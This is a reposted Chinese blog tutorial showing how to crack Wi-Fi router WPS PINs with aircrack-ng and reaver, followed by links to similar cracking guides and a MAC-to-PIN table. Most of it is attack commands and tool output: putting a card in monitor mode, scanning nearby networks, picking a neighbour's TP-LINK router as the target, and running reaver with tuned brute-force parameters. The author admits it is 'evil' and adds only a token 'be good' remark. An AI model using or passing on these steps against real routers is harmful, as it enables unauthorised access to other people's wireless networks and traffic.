aircrack和reaver破解路由器PIN码

转载 2015年07月10日 19:41:14

使用 aircrack,寻找附近开启wps的路由器,邪恶……嘻嘻

airmon-ng start wlan0
airodump-ng mon0
CH 11 ][ Elapsed: 36 s ][ 2012-12-18 04:46                                         
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                                                     
 00:0E:2E:FD:C4:BB   -1        0        0    0  -1  -1                    <length:  0>                                                                                                              
 4C:E6:76:60:3F:20  -13      123        0    0  11  54e  WPA2 CCMP   PSK  cuier-1                                                                                                                   
 B0:48:7A:52:F4:72  -23       42        0    0   1   WPA2 CCMP   PSK  FAST_52F472                                                                                                               
 8C:21:0A:5F:A2:FA  -35       28        0    0   1  WPA2 CCMP   PSK  TP-LINK_5FA2FA                                                                                                            
 E0:05:C5:D3:3F:00  -42       33        0    0   2   WPA2 CCMP   PSK  TP-LINK_D33F00                                                                                                            
 EC:17:2F:7D:12:1E  -49       56        1    0   6   WPA2 CCMP   PSK  wg7788                                                                                                                    
 B0:48:7A:5D:22:EA  -51       36        0    0   6  WPA2 CCMP   PSK  TP-LINK_1202

使用reaver 破解开启wps功能的路由器密码

比如这条,信号还不错

8C:21:0A:5F:A2:FA -35 28 0 0 1 54e. WPA2 CCMP PSK TP-LINK_5FA2FA
root@home:~/soft/reaver-1.4#  reaver  -i  mon0  -b 8C:21:0A:5F:A2:FA  -a  -S  -vv  -d2  -t 5 -c 1Reaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>[+] Switching mon0 to channel 1[+] Waiting for beacon from 8C:21:0A:5F:A2:FA[+] Associated with 8C:21:0A:5F:A2:FA (ESSID: TP-LINK_5FA2FA)[+] Trying pin 12345670[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response

这样就开始破解了哦,耐心等待结果就好了……不要太邪恶哦。做做测试还是可以的,要做个好童鞋……


##########################################################################

附上reaver调整参数的一些小技巧
reaver:

-i 监听后接口名称
-b 目标mac地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key(可以提高PJ速度)
-vv 显示更多的非严重警告
-d 即delay每穷举一次的闲置时间 预设为1秒
-t 即timeout每次穷举等待反馈的最长时间
-c指定频道可以方便找到信号,如-c1 指定1频道,大家查看自己的目标频道做相应修改 (非TP-LINK路由推荐–d9 –t9参数防止路由僵死
示例:
reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)
应因状况调整参数(-c后面都已目标频道为1作为例子)
目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1
目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1

注:54e后面有点(.)的是开了wps。但是这个要多试几次才准。可以先用Qss软件测试一下

        现在的新版路由器已经加入防PING功能,,,而且默认关闭了WPS,,,WPS时代即将过去。。。。

相关文章推荐

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络

【前言】     现在的路由器大多都默认用 WPA2-PSK 方式对无线网络进行加密了,不能再像 WEP 加密方式那样好破解,使用字典又需要费心费力地整理字典,而且字典破解的效率还慢。所以我们需要更有...

树莓派(RASPBERRYPI)安装AIRCRACK-NG,REAVER及WIFI破解教程[整理]

原文链接:http://www.findspace.name/res/1184转载请注明硬件环境树莓派B+一个(我用的是debian环境) PC一台(或其它设备直接操作PI就行) 无线网卡(能用就...

ubuntu14.04使用reaver跑pin码

今天刚说过没找到支持ubuntu14.04用reaver跑pin的旧版库文件这就有摸索到方法了... 另外安装系统ubuntu14.04以及一系列破解工具比如aircrack,minidwep等都不在...

Pin码免跑包对应路由器

Pin码免跑包对应路由器 MAC对应PIN码表(私藏分享) 有些朋友PJ出来的MAC和PIN有一些关系,基本上MAC前4位相同的,PIN码也相同,故做了以下工作 前4位指...
  • bjash
  • bjash
  • 2013年07月23日 09:26
  • 4714

精解reaver用BT5成功PIN解码

转自:黑吧安全网 PIN码破密特点: 1、不需要客户端 2、有PIN码就能获得无线密码 3、八位数PIN码实际只有一万一千组随机密码 4、抓包、EWSA跑包,每个环节...
  • grewumi
  • grewumi
  • 2013年01月22日 20:12
  • 834

精解reaver用BT5成功PIN解码

精解reaver用BT5成功PIN解码  (2012-09-20 14:06:23) 转载▼ 标签:  reaver   bt5   pin   ...

wifislax最终版reaver穷举PIN教程

wifislax最终版reaver穷举PIN教程
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:aircrack和reaver破解路由器PIN码
举报原因:
原因补充:

(最多只允许输入30个字)